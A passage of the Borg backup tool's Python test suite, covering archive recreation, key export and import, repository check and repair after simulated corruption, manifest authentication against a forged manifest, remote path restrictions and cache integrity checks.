file_list = self.cmd('list', self.repository_location + '::test', 'input/compressible',
'--format', '{size} {csize} {sha256}')
size, csize, sha256_after = file_list.split(' ')
assert int(csize) < int(size)
assert sha256_before == sha256_after
def test_recreate_timestamp(self):
local_timezone = datetime.now(timezone(timedelta(0))).astimezone().tzinfo
self.create_test_files()
self.cmd('init', '--encryption=repokey', self.repository_location)
archive = self.repository_location + '::test0'
self.cmd('create', archive, 'input')
self.cmd('recreate', '--timestamp', "1970-01-02T00:00:00", '--comment',
'test', archive)
info = self.cmd('info', archive).splitlines()
dtime = datetime(1970, 1, 2) + local_timezone.utcoffset(None)
s_time = dtime.strftime("%Y-%m-%d")
assert any([re.search(r'Time \(start\).+ %s' % s_time, item) for item in info])
assert any([re.search(r'Time \(end\).+ %s' % s_time, item) for item in info])
def test_recreate_dry_run(self):
self.create_regular_file('compressible', size=10000)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
archives_before = self.cmd('list', self.repository_location + '::test')
self.cmd('recreate', self.repository_location, '-n', '-e', 'input/compressible')
self.check_cache()
archives_after = self.cmd('list', self.repository_location + '::test')
assert archives_after == archives_before
def test_recreate_skips_nothing_to_do(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
info_before = self.cmd('info', self.repository_location + '::test')
self.cmd('recreate', self.repository_location, '--chunker-params', 'default')
self.check_cache()
info_after = self.cmd('info', self.repository_location + '::test')
assert info_before == info_after # includes archive ID
def test_with_lock(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
lock_path = os.path.join(self.repository_path, 'lock.exclusive')
cmd = 'python3', '-c', 'import os, sys; sys.exit(42 if os.path.exists("%s") else 23)' % lock_path
self.cmd('with-lock', self.repository_location, *cmd, fork=True, exit_code=42)
def test_recreate_list_output(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file1', size=0)
self.create_regular_file('file2', size=0)
self.create_regular_file('file3', size=0)
self.create_regular_file('file4', size=0)
self.create_regular_file('file5', size=0)
self.cmd('create', self.repository_location + '::test', 'input')
output = self.cmd('recreate', '--list', '--info', self.repository_location + '::test', '-e', 'input/file2')
self.check_cache()
self.assert_in("input/file1", output)
self.assert_in("x input/file2", output)
output = self.cmd('recreate', '--list', self.repository_location + '::test', '-e', 'input/file3')
self.check_cache()
self.assert_in("input/file1", output)
self.assert_in("x input/file3", output)
output = self.cmd('recreate', self.repository_location + '::test', '-e', 'input/file4')
self.check_cache()
self.assert_not_in("input/file1", output)
self.assert_not_in("x input/file4", output)
output = self.cmd('recreate', '--info', self.repository_location + '::test', '-e', 'input/file5')
self.check_cache()
self.assert_not_in("input/file1", output)
self.assert_not_in("x input/file5", output)
def test_bad_filters(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
self.cmd('delete', '--first', '1', '--last', '1', self.repository_location, fork=True, exit_code=2)
def test_key_export_keyfile(self):
export_file = self.output_path + '/exported'
self.cmd('init', self.repository_location, '--encryption', 'keyfile')
repo_id = self._extract_repository_id(self.repository_path)
self.cmd('key', 'export', self.repository_location, export_file)
with open(export_file, 'r') as fd:
export_contents = fd.read()
assert export_contents.startswith('BORG_KEY ' + bin_to_hex(repo_id) + '\n')
key_file = self.keys_path + '/' + os.listdir(self.keys_path)[0]
with open(key_file, 'r') as fd:
key_contents = fd.read()
assert key_contents == export_contents
os.unlink(key_file)
self.cmd('key', 'import', self.repository_location, export_file)
with open(key_file, 'r') as fd:
key_contents2 = fd.read()
assert key_contents2 == key_contents
def test_key_export_repokey(self):
export_file = self.output_path + '/exported'
self.cmd('init', self.repository_location, '--encryption', 'repokey')
repo_id = self._extract_repository_id(self.repository_path)
self.cmd('key', 'export', self.repository_location, export_file)
with open(export_file, 'r') as fd:
export_contents = fd.read()
assert export_contents.startswith('BORG_KEY ' + bin_to_hex(repo_id) + '\n')
with Repository(self.repository_path) as repository:
repo_key = RepoKey(repository)
repo_key.load(None, Passphrase.env_passphrase())
backup_key = KeyfileKey(key.TestKey.MockRepository())
backup_key.load(export_file, Passphrase.env_passphrase())
assert repo_key.enc_key == backup_key.enc_key
with Repository(self.repository_path) as repository:
repository.save_key(b'')
self.cmd('key', 'import', self.repository_location, export_file)
with Repository(self.repository_path) as repository:
repo_key2 = RepoKey(repository)
repo_key2.load(None, Passphrase.env_passphrase())
assert repo_key2.enc_key == repo_key2.enc_key
def test_key_export_qr(self):
export_file = self.output_path + '/exported.html'
self.cmd('init', self.repository_location, '--encryption', 'repokey')
repo_id = self._extract_repository_id(self.repository_path)
self.cmd('key', 'export', '--qr-html', self.repository_location, export_file)
with open(export_file, 'r', encoding='utf-8') as fd:
export_contents = fd.read()
assert bin_to_hex(repo_id) in export_contents
assert export_contents.startswith('<!doctype html>')
assert export_contents.endswith('</html>')
def test_key_export_directory(self):
export_directory = self.output_path + '/exported'
os.mkdir(export_directory)
self.cmd('init', self.repository_location, '--encryption', 'repokey')
self.cmd('key', 'export', self.repository_location, export_directory, exit_code=EXIT_ERROR)
def test_key_import_errors(self):
export_file = self.output_path + '/exported'
self.cmd('init', self.repository_location, '--encryption', 'keyfile')
self.cmd('key', 'import', self.repository_location, export_file, exit_code=EXIT_ERROR)
with open(export_file, 'w') as fd:
fd.write('something not a key\n')
if self.FORK_DEFAULT:
self.cmd('key', 'import', self.repository_location, export_file, exit_code=2)
else:
with pytest.raises(NotABorgKeyFile):
self.cmd('key', 'import', self.repository_location, export_file)
with open(export_file, 'w') as fd:
fd.write('BORG_KEY a0a0a0\n')
if self.FORK_DEFAULT:
self.cmd('key', 'import', self.repository_location, export_file, exit_code=2)
else:
with pytest.raises(RepoIdMismatch):
self.cmd('key', 'import', self.repository_location, export_file)
def test_key_export_paperkey(self):
repo_id = 'e294423506da4e1ea76e8dcdf1a3919624ae3ae496fddf905610c351d3f09239'
export_file = self.output_path + '/exported'
self.cmd('init', self.repository_location, '--encryption', 'keyfile')
self._set_repository_id(self.repository_path, unhexlify(repo_id))
key_file = self.keys_path + '/' + os.listdir(self.keys_path)[0]
with open(key_file, 'w') as fd:
fd.write(KeyfileKey.FILE_ID + ' ' + repo_id + '\n')
fd.write(b2a_base64(b'abcdefghijklmnopqrstu').decode())
self.cmd('key', 'export', '--paper', self.repository_location, export_file)
with open(export_file, 'r') as fd:
export_contents = fd.read()
assert export_contents == """To restore key use borg key import --paper /path/to/repo
BORG PAPER KEY v1
id: 2 / e29442 3506da 4e1ea7 / 25f62a 5a3d41 - 02
1: 616263 646566 676869 6a6b6c 6d6e6f 707172 - 6d
2: 737475 - 88
"""
def test_key_import_paperkey(self):
repo_id = 'e294423506da4e1ea76e8dcdf1a3919624ae3ae496fddf905610c351d3f09239'
self.cmd('init', self.repository_location, '--encryption', 'keyfile')
self._set_repository_id(self.repository_path, unhexlify(repo_id))
key_file = self.keys_path + '/' + os.listdir(self.keys_path)[0]
with open(key_file, 'w') as fd:
fd.write(KeyfileKey.FILE_ID + ' ' + repo_id + '\n')
fd.write(b2a_base64(b'abcdefghijklmnopqrstu').decode())
typed_input = (
b'2 / e29442 3506da 4e1ea7 / 25f62a 5a3d41 02\n' # Forgot to type "-"
b'2 / e29442 3506da 4e1ea7 25f62a 5a3d41 - 02\n' # Forgot to type second "/"
b'2 / e29442 3506da 4e1ea7 / 25f62a 5a3d42 - 02\n' # Typo (..42 not ..41)
b'2 / e29442 3506da 4e1ea7 / 25f62a 5a3d41 - 02\n' # Correct! Congratulations
b'616263 646566 676869 6a6b6c 6d6e6f 707172 - 6d\n'
b'\n\n' # Abort [yN] => N
b'737475 88\n' # missing "-"
b'73747i - 88\n' # typo
b'73747 - 88\n' # missing nibble
b'73 74 75 - 89\n' # line checksum mismatch
b'00a1 - 88\n' # line hash collision - overall hash mismatch, have to start over
b'2 / e29442 3506da 4e1ea7 / 25f62a 5a3d41 - 02\n'
b'616263 646566 676869 6a6b6c 6d6e6f 707172 - 6d\n'
b'73 74 75 - 88\n'
)
# In case that this has to change, here is a quick way to find a colliding line hash:
#
# from hashlib import sha256
# hash_fn = lambda x: sha256(b'\x00\x02' + x).hexdigest()[:2]
# for i in range(1000):
# if hash_fn(i.to_bytes(2, byteorder='big')) == '88': # 88 = line hash
# print(i.to_bytes(2, 'big'))
# break
self.cmd('key', 'import', '--paper', self.repository_location, input=typed_input)
# Test abort paths
typed_input = b'\ny\n'
self.cmd('key', 'import', '--paper', self.repository_location, input=typed_input)
typed_input = b'2 / e29442 3506da 4e1ea7 / 25f62a 5a3d41 - 02\n\ny\n'
self.cmd('key', 'import', '--paper', self.repository_location, input=typed_input)
def test_debug_dump_manifest(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
dump_file = self.output_path + '/dump'
output = self.cmd('debug', 'dump-manifest', self.repository_location, dump_file)
assert output == ""
with open(dump_file, "r") as f:
result = json.load(f)
assert 'archives' in result
assert 'config' in result
assert 'item_keys' in result
assert 'timestamp' in result
assert 'version' in result
def test_debug_dump_archive(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
dump_file = self.output_path + '/dump'
output = self.cmd('debug', 'dump-archive', self.repository_location + "::test", dump_file)
assert output == ""
with open(dump_file, "r") as f:
result = json.load(f)
assert '_name' in result
assert '_manifest_entry' in result
assert '_meta' in result
assert '_items' in result
def test_debug_refcount_obj(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
output = self.cmd('debug', 'refcount-obj', self.repository_location, '0' * 64).strip()
assert output == 'object 0000000000000000000000000000000000000000000000000000000000000000 not found [info from chunks cache].'
create_json = json.loads(self.cmd('create', '--json', self.repository_location + '::test', 'input'))
archive_id = create_json['archive']['id']
output = self.cmd('debug', 'refcount-obj', self.repository_location, archive_id).strip()
assert output == 'object ' + archive_id + ' has 1 referrers [info from chunks cache].'
# Invalid IDs do not abort or return an error
output = self.cmd('debug', 'refcount-obj', self.repository_location, '124', 'xyza').strip()
assert output == 'object id 124 is invalid.\nobject id xyza is invalid.'
def test_debug_info(self):
output = self.cmd('debug', 'info')
assert 'CRC implementation' in output
assert 'Python' in output
def test_benchmark_crud(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
with environment_variable(_BORG_BENCHMARK_CRUD_TEST='YES'):
self.cmd('benchmark', 'crud', self.repository_location, self.input_path)
def test_config(self):
self.create_test_files()
os.unlink('input/flagfile')
self.cmd('init', '--encryption=repokey', self.repository_location)
output = self.cmd('config', '--list', self.repository_location)
self.assert_in('[repository]', output)
self.assert_in('version', output)
self.assert_in('segments_per_dir', output)
self.assert_in('storage_quota', output)
self.assert_in('append_only', output)
self.assert_in('additional_free_space', output)
self.assert_in('id', output)
for cfg_key, cfg_value in [
('additional_free_space', '2G'),
('repository.append_only', '1'),
]:
output = self.cmd('config', self.repository_location, cfg_key)
assert output == '0' + '\n'
self.cmd('config', self.repository_location, cfg_key, cfg_value)
output = self.cmd('config', self.repository_location, cfg_key)
assert output == cfg_value + '\n'
self.cmd('config', '--delete', self.repository_location, cfg_key)
self.cmd('config', self.repository_location, cfg_key, exit_code=1)
self.cmd('config', '--list', '--delete', self.repository_location, exit_code=2)
self.cmd('config', self.repository_location, exit_code=2)
self.cmd('config', self.repository_location, 'invalid-option', exit_code=1)
requires_gnutar = pytest.mark.skipif(not have_gnutar(), reason='GNU tar must be installed for this test.')
requires_gzip = pytest.mark.skipif(not shutil.which('gzip'), reason='gzip must be installed for this test.')
@requires_gnutar
def test_export_tar(self):
self.create_test_files()
os.unlink('input/flagfile')
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
self.cmd('export-tar', self.repository_location + '::test', 'simple.tar', '--progress')
with changedir('output'):
# This probably assumes GNU tar. Note -p switch to extract permissions regardless of umask.
subprocess.check_call(['tar', 'xpf', '../simple.tar', '--warning=no-timestamp'])
self.assert_dirs_equal('input', 'output/input', ignore_bsdflags=True, ignore_xattrs=True, ignore_ns=True)
@requires_gnutar
@requires_gzip
def test_export_tar_gz(self):
if not shutil.which('gzip'):
pytest.skip('gzip is not installed')
self.create_test_files()
os.unlink('input/flagfile')
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
list = self.cmd('export-tar', self.repository_location + '::test', 'simple.tar.gz', '--list')
assert 'input/file1\n' in list
assert 'input/dir2\n' in list
with changedir('output'):
subprocess.check_call(['tar', 'xpf', '../simple.tar.gz', '--warning=no-timestamp'])
self.assert_dirs_equal('input', 'output/input', ignore_bsdflags=True, ignore_xattrs=True, ignore_ns=True)
@requires_gnutar
def test_export_tar_strip_components(self):
if not shutil.which('gzip'):
pytest.skip('gzip is not installed')
self.create_test_files()
os.unlink('input/flagfile')
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
list = self.cmd('export-tar', self.repository_location + '::test', 'simple.tar', '--strip-components=1', '--list')
# --list's path are those before processing with --strip-components
assert 'input/file1\n' in list
assert 'input/dir2\n' in list
with changedir('output'):
subprocess.check_call(['tar', 'xpf', '../simple.tar', '--warning=no-timestamp'])
self.assert_dirs_equal('input', 'output/', ignore_bsdflags=True, ignore_xattrs=True, ignore_ns=True)
@requires_hardlinks
@requires_gnutar
def test_export_tar_strip_components_links(self):
self._extract_hardlinks_setup()
self.cmd('export-tar', self.repository_location + '::test', 'output.tar', '--strip-components=2')
with changedir('output'):
subprocess.check_call(['tar', 'xpf', '../output.tar', '--warning=no-timestamp'])
assert os.stat('hardlink').st_nlink == 2
assert os.stat('subdir/hardlink').st_nlink == 2
assert os.stat('aaaa').st_nlink == 2
assert os.stat('source2').st_nlink == 2
@requires_hardlinks
@requires_gnutar
def test_extract_hardlinks_tar(self):
self._extract_hardlinks_setup()
self.cmd('export-tar', self.repository_location + '::test', 'output.tar', 'input/dir1')
with changedir('output'):
subprocess.check_call(['tar', 'xpf', '../output.tar', '--warning=no-timestamp'])
assert os.stat('input/dir1/hardlink').st_nlink == 2
assert os.stat('input/dir1/subdir/hardlink').st_nlink == 2
assert os.stat('input/dir1/aaaa').st_nlink == 2
assert os.stat('input/dir1/source2').st_nlink == 2
def test_detect_attic_repo(self):
path = make_attic_repo(self.repository_path)
cmds = [
['create', path + '::test', self.tmpdir],
['extract', path + '::test'],
['check', path],
['rename', path + '::test', 'newname'],
['list', path],
['delete', path],
['prune', path],
['info', path + '::test'],
['key', 'export', path, 'exported'],
['key', 'import', path, 'import'],
['key', 'change-passphrase', path],
['break-lock', path],
]
for args in cmds:
output = self.cmd(*args, fork=True, exit_code=2)
assert 'Attic repository detected.' in output
@unittest.skipUnless('binary' in BORG_EXES, 'no borg.exe available')
class ArchiverTestCaseBinary(ArchiverTestCase):
EXE = 'borg.exe'
FORK_DEFAULT = True
@unittest.skip('does not raise Exception, but sets rc==2')
def test_init_parent_dirs(self):
pass
@unittest.skip('patches objects')
def test_init_interrupt(self):
pass
@unittest.skip('patches objects')
def test_extract_capabilities(self):
pass
@unittest.skip('patches objects')
def test_extract_xattrs_errors(self):
pass
@unittest.skip('test_basic_functionality seems incompatible with fakeroot and/or the binary.')
def test_basic_functionality(self):
pass
@unittest.skip('test_overwrite seems incompatible with fakeroot and/or the binary.')
def test_overwrite(self):
pass
def test_fuse(self):
if fakeroot_detected():
unittest.skip('test_fuse with the binary is not compatible with fakeroot')
else:
super().test_fuse()
class ArchiverCheckTestCase(ArchiverTestCaseBase):
def setUp(self):
super().setUp()
with patch.object(ChunkBuffer, 'BUFFER_SIZE', 10):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_src_archive('archive1')
self.create_src_archive('archive2')
def test_check_usage(self):
output = self.cmd('check', '-v', '--progress', self.repository_location, exit_code=0)
self.assert_in('Starting repository check', output)
self.assert_in('Starting archive consistency check', output)
self.assert_in('Checking segments', output)
# reset logging to new process default to avoid need for fork=True on next check
logging.getLogger('borg.output.progress').setLevel(logging.NOTSET)
output = self.cmd('check', '-v', '--repository-only', self.repository_location, exit_code=0)
self.assert_in('Starting repository check', output)
self.assert_not_in('Starting archive consistency check', output)
self.assert_not_in('Checking segments', output)
output = self.cmd('check', '-v', '--archives-only', self.repository_location, exit_code=0)
self.assert_not_in('Starting repository check', output)
self.assert_in('Starting archive consistency check', output)
output = self.cmd('check', '-v', '--archives-only', '--prefix=archive2', self.repository_location, exit_code=0)
self.assert_not_in('archive1', output)
output = self.cmd('check', '-v', '--archives-only', '--first=1', self.repository_location, exit_code=0)
self.assert_in('archive1', output)
self.assert_not_in('archive2', output)
output = self.cmd('check', '-v', '--archives-only', '--last=1', self.repository_location, exit_code=0)
self.assert_not_in('archive1', output)
self.assert_in('archive2', output)
def test_missing_file_chunk(self):
archive, repository = self.open_archive('archive1')
with repository:
for item in archive.iter_items():
if item.path.endswith('testsuite/archiver.py'):
valid_chunks = item.chunks
killed_chunk = valid_chunks[-1]
repository.delete(killed_chunk.id)
break
else:
self.fail('should not happen')
repository.commit(compact=False)
self.cmd('check', self.repository_location, exit_code=1)
output = self.cmd('check', '--repair', self.repository_location, exit_code=0)
self.assert_in('New missing file chunk detected', output)
self.cmd('check', self.repository_location, exit_code=0)
output = self.cmd('list', '--format={health}#{path}{LF}', self.repository_location + '::archive1', exit_code=0)
self.assert_in('broken#', output)
# check that the file in the old archives has now a different chunk list without the killed chunk
for archive_name in ('archive1', 'archive2'):
archive, repository = self.open_archive(archive_name)
with repository:
for item in archive.iter_items():
if item.path.endswith('testsuite/archiver.py'):
self.assert_not_equal(valid_chunks, item.chunks)
self.assert_not_in(killed_chunk, item.chunks)
break
else:
self.fail('should not happen')
# do a fresh backup (that will include the killed chunk)
with patch.object(ChunkBuffer, 'BUFFER_SIZE', 10):
self.create_src_archive('archive3')
# check should be able to heal the file now:
output = self.cmd('check', '-v', '--repair', self.repository_location, exit_code=0)
self.assert_in('Healed previously missing file chunk', output)
self.assert_in('testsuite/archiver.py: Completely healed previously damaged file!', output)
# check that the file in the old archives has the correct chunks again
for archive_name in ('archive1', 'archive2'):
archive, repository = self.open_archive(archive_name)
with repository:
for item in archive.iter_items():
if item.path.endswith('testsuite/archiver.py'):
self.assert_equal(valid_chunks, item.chunks)
break
else:
self.fail('should not happen')
# list is also all-healthy again
output = self.cmd('list', '--format={health}#{path}{LF}', self.repository_location + '::archive1', exit_code=0)
self.assert_not_in('broken#', output)
def test_missing_archive_item_chunk(self):
archive, repository = self.open_archive('archive1')
with repository:
repository.delete(archive.metadata.items[0])
repository.commit(compact=False)
self.cmd('check', self.repository_location, exit_code=1)
self.cmd('check', '--repair', self.repository_location, exit_code=0)
self.cmd('check', self.repository_location, exit_code=0)
def test_missing_archive_metadata(self):
archive, repository = self.open_archive('archive1')
with repository:
repository.delete(archive.id)
repository.commit(compact=False)
self.cmd('check', self.repository_location, exit_code=1)
self.cmd('check', '--repair', self.repository_location, exit_code=0)
self.cmd('check', self.repository_location, exit_code=0)
def test_missing_manifest(self):
archive, repository = self.open_archive('archive1')
with repository:
repository.delete(Manifest.MANIFEST_ID)
repository.commit(compact=False)
self.cmd('check', self.repository_location, exit_code=1)
output = self.cmd('check', '-v', '--repair', self.repository_location, exit_code=0)
self.assert_in('archive1', output)
self.assert_in('archive2', output)
self.cmd('check', self.repository_location, exit_code=0)
def test_corrupted_manifest(self):
archive, repository = self.open_archive('archive1')
with repository:
manifest = repository.get(Manifest.MANIFEST_ID)
corrupted_manifest = manifest + b'corrupted!'
repository.put(Manifest.MANIFEST_ID, corrupted_manifest)
repository.commit(compact=False)
self.cmd('check', self.repository_location, exit_code=1)
output = self.cmd('check', '-v', '--repair', self.repository_location, exit_code=0)
self.assert_in('archive1', output)
self.assert_in('archive2', output)
self.cmd('check', self.repository_location, exit_code=0)
def test_manifest_rebuild_corrupted_chunk(self):
archive, repository = self.open_archive('archive1')
with repository:
manifest = repository.get(Manifest.MANIFEST_ID)
corrupted_manifest = manifest + b'corrupted!'
repository.put(Manifest.MANIFEST_ID, corrupted_manifest)
chunk = repository.get(archive.id)
corrupted_chunk = chunk + b'corrupted!'
repository.put(archive.id, corrupted_chunk)
repository.commit(compact=False)
self.cmd('check', self.repository_location, exit_code=1)
output = self.cmd('check', '-v', '--repair', self.repository_location, exit_code=0)
self.assert_in('archive2', output)
self.cmd('check', self.repository_location, exit_code=0)
def test_manifest_rebuild_duplicate_archive(self):
archive, repository = self.open_archive('archive1')
key = archive.key
with repository:
manifest = repository.get(Manifest.MANIFEST_ID)
corrupted_manifest = manifest + b'corrupted!'
repository.put(Manifest.MANIFEST_ID, corrupted_manifest)
archive = msgpack.packb({
'cmdline': [],
'items': [],
'hostname': 'foo',
'username': 'bar',
'name': 'archive1',
'time': '2016-12-15T18:49:51.849711',
'version': 1,
})
archive_id = key.id_hash(archive)
repository.put(archive_id, key.encrypt(archive))
repository.commit(compact=False)
self.cmd('check', self.repository_location, exit_code=1)
self.cmd('check', '--repair', self.repository_location, exit_code=0)
output = self.cmd('list', self.repository_location)
self.assert_in('archive1', output)
self.assert_in('archive1.1', output)
self.assert_in('archive2', output)
def test_extra_chunks(self):
self.cmd('check', self.repository_location, exit_code=0)
with Repository(self.repository_location, exclusive=True) as repository:
repository.put(b'01234567890123456789012345678901', b'xxxx')
repository.commit(compact=False)
self.cmd('check', self.repository_location, exit_code=1)
self.cmd('check', self.repository_location, exit_code=1)
self.cmd('check', '--repair', self.repository_location, exit_code=0)
self.cmd('check', self.repository_location, exit_code=0)
self.cmd('extract', '--dry-run', self.repository_location + '::archive1', exit_code=0)
def _test_verify_data(self, *init_args):
shutil.rmtree(self.repository_path)
self.cmd('init', self.repository_location, *init_args)
self.create_src_archive('archive1')
archive, repository = self.open_archive('archive1')
with repository:
for item in archive.iter_items():
if item.path.endswith('testsuite/archiver.py'):
chunk = item.chunks[-1]
data = repository.get(chunk.id) + b'1234'
repository.put(chunk.id, data)
break
repository.commit(compact=False)
self.cmd('check', self.repository_location, exit_code=0)
output = self.cmd('check', '--verify-data', self.repository_location, exit_code=1)
assert bin_to_hex(chunk.id) + ', integrity error' in output
# repair (heal is tested in another test)
output = self.cmd('check', '--repair', '--verify-data', self.repository_location, exit_code=0)
assert bin_to_hex(chunk.id) + ', integrity error' in output
assert 'testsuite/archiver.py: New missing file chunk detected' in output
def test_verify_data(self):
self._test_verify_data('--encryption', 'repokey')
def test_verify_data_unencrypted(self):
self._test_verify_data('--encryption', 'none')
def test_empty_repository(self):
with Repository(self.repository_location, exclusive=True) as repository:
for id_ in repository.list():
repository.delete(id_)
repository.commit(compact=False)
self.cmd('check', self.repository_location, exit_code=1)
def test_attic013_acl_bug(self):
# Attic up to release 0.13 contained a bug where every item unintentionally received
# a b'acl'=None key-value pair.
# This bug can still live on in Borg repositories (through borg upgrade).
class Attic013Item:
def as_dict(self):
return {
# These are required
b'path': '1234',
b'mtime': 0,
b'mode': 0,
b'user': b'0',
b'group': b'0',
b'uid': 0,
b'gid': 0,
# acl is the offending key.
b'acl': None,
}
archive, repository = self.open_archive('archive1')
with repository:
manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
with Cache(repository, key, manifest) as cache:
archive = Archive(repository, key, manifest, '0.13', cache=cache, create=True)
archive.items_buffer.add(Attic013Item())
archive.save()
self.cmd('check', self.repository_location, exit_code=0)
self.cmd('list', self.repository_location + '::0.13', exit_code=0)
class ManifestAuthenticationTest(ArchiverTestCaseBase):
def spoof_manifest(self, repository):
with repository:
_, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
repository.put(Manifest.MANIFEST_ID, key.encrypt(msgpack.packb({
'version': 1,
'archives': {},
'config': {},
'timestamp': (datetime.utcnow() + timedelta(days=1)).strftime(ISO_FORMAT),
})))
repository.commit(compact=False)
def test_fresh_init_tam_required(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
repository = Repository(self.repository_path, exclusive=True)
with repository:
manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
repository.put(Manifest.MANIFEST_ID, key.encrypt(msgpack.packb({
'version': 1,
'archives': {},
'timestamp': (datetime.utcnow() + timedelta(days=1)).strftime(ISO_FORMAT),
})))
repository.commit(compact=False)
with pytest.raises(TAMRequiredError):
self.cmd('list', self.repository_location)
def test_not_required(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_src_archive('archive1234')
repository = Repository(self.repository_path, exclusive=True)
with repository:
shutil.rmtree(get_security_dir(bin_to_hex(repository.id)))
_, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
key.tam_required = False
key.change_passphrase(key._passphrase)
manifest = msgpack.unpackb(key.decrypt(None, repository.get(Manifest.MANIFEST_ID)))
del manifest[b'tam']
repository.put(Manifest.MANIFEST_ID, key.encrypt(msgpack.packb(manifest)))
repository.commit(compact=False)
output = self.cmd('list', '--debug', self.repository_location)
assert 'archive1234' in output
assert 'TAM not found and not required' in output
# Run upgrade
self.cmd('upgrade', '--tam', self.repository_location)
# Manifest must be authenticated now
output = self.cmd('list', '--debug', self.repository_location)
assert 'archive1234' in output
assert 'TAM-verified manifest' in output
# Try to spoof / modify pre-1.0.9
self.spoof_manifest(repository)
# Fails
with pytest.raises(TAMRequiredError):
self.cmd('list', self.repository_location)
# Force upgrade
self.cmd('upgrade', '--tam', '--force', self.repository_location)
self.cmd('list', self.repository_location)
def test_disable(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_src_archive('archive1234')
self.cmd('upgrade', '--disable-tam', self.repository_location)
repository = Repository(self.repository_path, exclusive=True)
self.spoof_manifest(repository)
assert not self.cmd('list', self.repository_location)
def test_disable2(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_src_archive('archive1234')
repository = Repository(self.repository_path, exclusive=True)
self.spoof_manifest(repository)
self.cmd('upgrade', '--disable-tam', self.repository_location)
assert not self.cmd('list', self.repository_location)
class RemoteArchiverTestCase(ArchiverTestCase):
prefix = '__testsuite__:'
def open_repository(self):
return RemoteRepository(Location(self.repository_location))
def test_remote_repo_restrict_to_path(self):
# restricted to repo directory itself:
with patch.object(RemoteRepository, 'extra_test_args', ['--restrict-to-path', self.repository_path]):
self.cmd('init', '--encryption=repokey', self.repository_location)
# restricted to repo directory itself, fail for other directories with same prefix:
with patch.object(RemoteRepository, 'extra_test_args', ['--restrict-to-path', self.repository_path]):
with pytest.raises(PathNotAllowed):
self.cmd('init', '--encryption=repokey', self.repository_location + '_0')
# restricted to a completely different path:
with patch.object(RemoteRepository, 'extra_test_args', ['--restrict-to-path', '/foo']):
with pytest.raises(PathNotAllowed):
self.cmd('init', '--encryption=repokey', self.repository_location + '_1')
path_prefix = os.path.dirname(self.repository_path)
# restrict to repo directory's parent directory:
with patch.object(RemoteRepository, 'extra_test_args', ['--restrict-to-path', path_prefix]):
self.cmd('init', '--encryption=repokey', self.repository_location + '_2')
# restrict to repo directory's parent directory and another directory:
with patch.object(RemoteRepository, 'extra_test_args', ['--restrict-to-path', '/foo', '--restrict-to-path', path_prefix]):
self.cmd('init', '--encryption=repokey', self.repository_location + '_3')
def test_remote_repo_restrict_to_repository(self):
# restricted to repo directory itself:
with patch.object(RemoteRepository, 'extra_test_args', ['--restrict-to-repository', self.repository_path]):
self.cmd('init', '--encryption=repokey', self.repository_location)
parent_path = os.path.join(self.repository_path, '..')
with patch.object(RemoteRepository, 'extra_test_args', ['--restrict-to-repository', parent_path]):
with pytest.raises(PathNotAllowed):
self.cmd('init', '--encryption=repokey', self.repository_location)
@unittest.skip('only works locally')
def test_debug_put_get_delete_obj(self):
pass
@unittest.skip('only works locally')
def test_config(self):
pass
def test_strip_components_doesnt_leak(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('dir/file', contents=b"test file contents 1")
self.create_regular_file('dir/file2', contents=b"test file contents 2")
self.create_regular_file('skipped-file1', contents=b"test file contents 3")
self.create_regular_file('skipped-file2', contents=b"test file contents 4")
self.create_regular_file('skipped-file3', contents=b"test file contents 5")
self.cmd('create', self.repository_location + '::test', 'input')
marker = 'cached responses left in RemoteRepository'
with changedir('output'):
res = self.cmd('extract', "--debug", self.repository_location + '::test', '--strip-components', '3')
self.assert_true(marker not in res)
with self.assert_creates_file('file'):
res = self.cmd('extract', "--debug", self.repository_location + '::test', '--strip-components', '2')
self.assert_true(marker not in res)
with self.assert_creates_file('dir/file'):
res = self.cmd('extract', "--debug", self.repository_location + '::test', '--strip-components', '1')
self.assert_true(marker not in res)
with self.assert_creates_file('input/dir/file'):
res = self.cmd('extract', "--debug", self.repository_location + '::test', '--strip-components', '0')
self.assert_true(marker not in res)
class ArchiverCorruptionTestCase(ArchiverTestCaseBase):
def setUp(self):
super().setUp()
self.create_test_files()
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cache_path = json.loads(self.cmd('info', self.repository_location, '--json'))['cache']['path']
def corrupt(self, file):
with open(file, 'r+b') as fd:
fd.seek(-1, io.SEEK_END)
fd.write(b'1')
def test_cache_chunks(self):
self.corrupt(os.path.join(self.cache_path, 'chunks'))
if self.FORK_DEFAULT:
out = self.cmd('info', self.repository_location, exit_code=2)
assert 'failed integrity check' in out
else:
with pytest.raises(FileIntegrityError):
self.cmd('info', self.repository_location)
def test_cache_files(self):
self.cmd('create', self.repository_location + '::test', 'input')
self.corrupt(os.path.join(self.cache_path, 'files'))
out = self.cmd('create', self.repository_location + '::test1', 'input')
# borg warns about the corrupt files cache, but then continues without files cache.
assert 'files cache is corrupted' in out
def test_chunks_archive(self):
self.cmd('create', self.repository_location + '::test1', 'input')
